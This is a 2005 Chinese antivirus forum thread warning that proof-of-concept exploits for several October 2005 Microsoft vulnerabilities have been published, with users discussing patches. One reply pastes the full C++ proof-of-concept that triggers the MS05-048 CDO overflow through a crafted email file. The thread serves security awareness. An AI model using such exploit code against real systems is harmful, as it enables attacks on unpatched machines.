【紧急通告】10月份微软最新4个漏洞的攻击代码被公布 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【紧急通告】10月份微软最新4个漏洞的攻击代码被公布

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12 3 4

1 / 4 页

跳转页

【紧急通告】10月份微软最新4个漏洞的攻击代码被公布

天天泡泡卡卡技术团队帖子:17486 注册: 2004-01-21 来自:安徽安庆	发表于： 2005-10-16 14:19 \| 只看楼主短消息资料字号：小中大 1楼【紧急通告】10月份微软最新4个漏洞的攻击代码被公布距离微软MS发布10月安全公告才两天，针对MS最新的三个漏洞的概念型攻击代码就出现在网上了。北京时间14日，法国著名的安全响应团队FrSIRT，在其网站上公布了针对MS05-044，MS05-045，和MS05-048的三个概念型的攻击代码。 MS05-044：Windows FTP 客户端中的漏洞可能允许篡改文件传输位置 (905495) MS05-045：网络连接管理器中的漏洞可能允许拒绝服务 (905414) MS05-048：Microsoft 协作对象中的漏洞可能允许远程执行代码 (907245) 根据8月份的"狙击波"速度来看,不久将有可能会被人利用.被关注的比较多的是:MS05-051. 来自国外安全厂商关于此漏洞的消息，称针对MSDTC（Microsoft Distributed Transaction Coordinator）漏洞可能会被病毒作者们利用，制造出新的蠕虫。尤其是WIN2000用户，可能再次遭受漏洞的攻击。根据最新的资料显示，针对WIN2000系统的MSDTC漏洞的攻击代码已经出现，在ImmunitySec Canvas customers中可以看到October 11, 2005: MS05-051 (MS DTC) Trigger for the bug in MS DTC on Windows 2000 (attach to msdtc.exe)以及October 14, 2005: ms_msdtc exploit。Russ Cooper（Cybertrust Inc.的高级工程师）称针对MSDTC漏洞的蠕虫可能会对3372端口进行扫描，并进行传播。本文来源于：动物家园(http://www.kingzoo.com)反病毒斗士报 2005-10-27 00:11:07
天天泡泡卡卡技术团队帖子:17486 注册: 2004-01-21 来自:安徽安庆	分享到：

我是天才陈叙强壮不惑狮帖子:797 注册: 2004-11-25 来自:	发表于： 2005-10-16 14:58 \| 短消息资料字号：小中大 2楼麻烦啊，又要更新了
我是天才陈叙强壮不惑狮帖子:797 注册: 2004-11-25 来自:

卧龙传说特邀体验者帖子:861 注册: 2005-09-18 来自:	发表于： 2005-10-16 16:45 \| 短消息资料字号：小中大 3楼明白，加强警戒我用的就是2000
卧龙传说特邀体验者帖子:861 注册: 2005-09-18 来自:

卧龙传说特邀体验者帖子:861 注册: 2005-09-18 来自:	发表于： 2005-10-16 16:46 \| 短消息资料字号：小中大 4楼好象这几个补丁都打了
卧龙传说特邀体验者帖子:861 注册: 2005-09-18 来自:

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2005-10-16 16:58 \| 短消息资料字号：小中大 5楼【回复“天天泡泡”的帖子】暂不打10月份的补丁(9个) 考验一下TPF2005
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

C++果冻初生襁褓狮帖子:1279 注册: 2004-03-28 来自:	发表于： 2005-10-16 17:48 \| 短消息资料字号：小中大 6楼 14号偶就见到这个消息了，这是其中针对MS05-048的代码： // // Microsoft CDO Proof of Concept Exploit by Gary O'leary-Steele <garyo at sec-1.com> // // Step 1. // // Create an E-mail named vuln.eml including a large "Content-Type:" header. // // Step 2. // // Compile with -GX option // #import <msado15.dll> no_namespace rename("EOF", "adoEOF") #import <cdosys.dll> rename_namespace("CDO") #include <stdio.h> int main() { CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush(); for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; } } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); } CoUninitialize(); return 0; } CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
C++果冻初生襁褓狮帖子:1279 注册: 2004-03-28 来自:

弹珠蓝宝初生襁褓狮帖子:519 注册: 2005-07-27 来自:	发表于： 2005-10-16 19:03 \| 短消息资料字号：小中大 7楼我已经更新了,好象有9个啊
弹珠蓝宝初生襁褓狮帖子:519 注册: 2005-07-27 来自:

不动如山飘泊而立狮帖子:740 注册: 2005-01-14 来自:	发表于： 2005-10-17 16:13 \| 短消息资料字号：小中大 8楼我也要看看
不动如山飘泊而立狮帖子:740 注册: 2005-01-14 来自:

山隹初生襁褓狮帖子:5 注册: 2005-10-01 来自:	发表于： 2005-10-17 18:14 \| 短消息资料字号：小中大 9楼我用2000天天中
山隹初生襁褓狮帖子:5 注册: 2005-10-01 来自:

春天的野百合初生襁褓狮帖子:96 注册: 2004-09-24 来自:	发表于： 2005-10-17 21:07 \| 短消息资料字号：小中大 10楼那种东西不是太懂!
春天的野百合初生襁褓狮帖子:96 注册: 2004-09-24 来自:

<<上一主题|下一主题>>

12 3 4

1 / 4 页

跳转页

页面顶部

Powered by Discuz!NT